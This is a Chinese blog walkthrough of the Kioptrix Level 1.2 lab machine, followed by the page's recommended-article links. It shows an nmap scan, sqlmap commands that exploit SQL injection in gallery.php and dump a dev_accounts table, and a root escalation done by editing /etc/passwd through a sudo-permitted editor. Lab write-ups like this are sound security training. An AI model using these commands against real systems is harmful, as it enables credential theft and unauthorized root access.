Kioptrix1.2

最新推荐文章于 2024-08-03 07:21:58 发布
最新推荐文章于 2024-08-03 07:21:58 发布
阅读量288 收藏 1
点赞数 7
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/140809009
版权

一、信息收集

主机发现&端口扫描

nmap 192.168.236.0/24

二、GetShell

步骤一:访问80端口,查看其他页面,需要做host绑定

步骤二:绑定之后访问,发现id参数

步骤三:id=1',存在SQL注入,利用工具

python3 sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --batch --dbs

python3 sqlmap.py -u "http://192.168.236.152/gallery/gallery.php?id=1" --batch -D gallery --tables

python3 sqlmap.py -u "http://192.168.236.152/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts --dump

步骤四:尝试ssh连接

三、提权

步骤一:sudo -l,发现都是root权限,无法利用

步骤二:查看当前目录,发现readme文件

步骤三:使用sudo ht编辑文件,发现报错,输入以下命令解决

export TERM=xterm

步骤四:输入F3打开/etc/passwd,将当前用户权限修改为root,退出,然后重新连接,输入id,成功提权

花椒椒椒
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
vuInhub靶场实战系列-Kioptrix Level #4
06-12
vuInhub靶场实战系列-Kioptrix Level #4
vuInhub靶场实战系列-Kioptrix Level #3
06-10
vuInhub靶场实战系列-Kioptrix Level #3
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1744
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
读零信任网络:在不可信网络中构建安全系统07设备信任
lyingSeven的博客
08-03 600
设备安全
数理方法习题 前六章.pdf
08-03
数理方法习题 前六章
某大型制造企业IT蓝图规划及实施路线.pptx
08-03
某大型制造企业IT蓝图规划及实施路线.pptx
基于Springboot和Vue的社区团购系统设计源码 社区团购系统设计代码(98分期末优秀大作业)
08-03
社区团购系统设计源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
去哪儿旅游&小红书-旅行行业:2023五一旅行趋势报告—想出去玩.pdf
最新发布
08-03
去哪儿旅游&小红书-旅行行业:2023五一旅行趋势报告—想出去玩
基于matlab设计的火焰检测定位.zip
08-03
在MATLAB中,可以使用多种方法进行车牌、人脸、车道线、表盘检测、行人识别和行为识别。以下是一些常见的方法: 1. 车牌检测:可以使用基于图像处理和机器学习的方法来检测车牌。常见的方法包括颜色过滤、形态学操作、边缘检测和字符分割等。 2. 人脸检测:可以使用基于特征提取和分类的方法来检测人脸。常见的方法包括Haar级联分类器、人工神经网络和深度学习方法等。 3. 车道线检测:可以使用基于边缘检测和曲线拟合的方法来检测车道线。常见的方法包括Canny边缘检测和霍夫变换等。 4. 表盘检测:可以使用基于特征提取和机器学习的方法来检测表盘。常见的方法包括颜色过滤、形态学操作、边缘检测和特征匹配等。 5. 行人识别:可以使用基于特征提取和分类的方法来识别行人。常见的方法包括HOG特征提取、SIFT特征提取和深度学习方法等。 6. 行为识别:可以使用基于特征提取和分类的方法来识别行为。常见的方法包括间接算法、基于模型的方法和深度学习方法等。 以上只是一些常见的方法,具体的实现还需要根据具体的问题和数据来选择合适的方法。MATLAB提供了丰富的图像处理和机器学习工具,可以方便地实现这些功能。
华工数字信号处理-DTMF信号的产生与识别 (1).doc
08-03
华工数字信号处理-DTMF信号的产生与识别 (1).doc
基于Springboot和Vue的社区团购系统设计源码 社区团购系统设计代码(优秀毕业设计)
08-03
社区团购系统设计源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
【参数辨识】基于matlab粒子群算法求解异步电动机的参数估计优化问题【含Matlab源码 6764期】.mp4
08-03
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
数学物理方法-期末-兰州城市学院.pdf
08-03
数学物理方法-期末-兰州城市学院
MDM+ESB解决方案.pptx
08-03
MDM+ESB解决方案.pptx
基于matlab的ConvMixer算法识别7个类别的对象.zip
08-03
基于matlab的ConvMixer算法识别7个类别的对象.zip
基于边缘计算网络的卸载优化及资源优化基于边缘计算网络的卸载优化及资源优化python源码+项目说明文档.zip
08-03
基于边缘计算网络的卸载优化及资源优化基于边缘计算网络的卸载优化及资源优化python源码+项目说明文档.zip 个人大三的课程作业、经导师指导并认可通过的高分设计项目,评审分96.5分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设或者课设、作业,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96.5分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值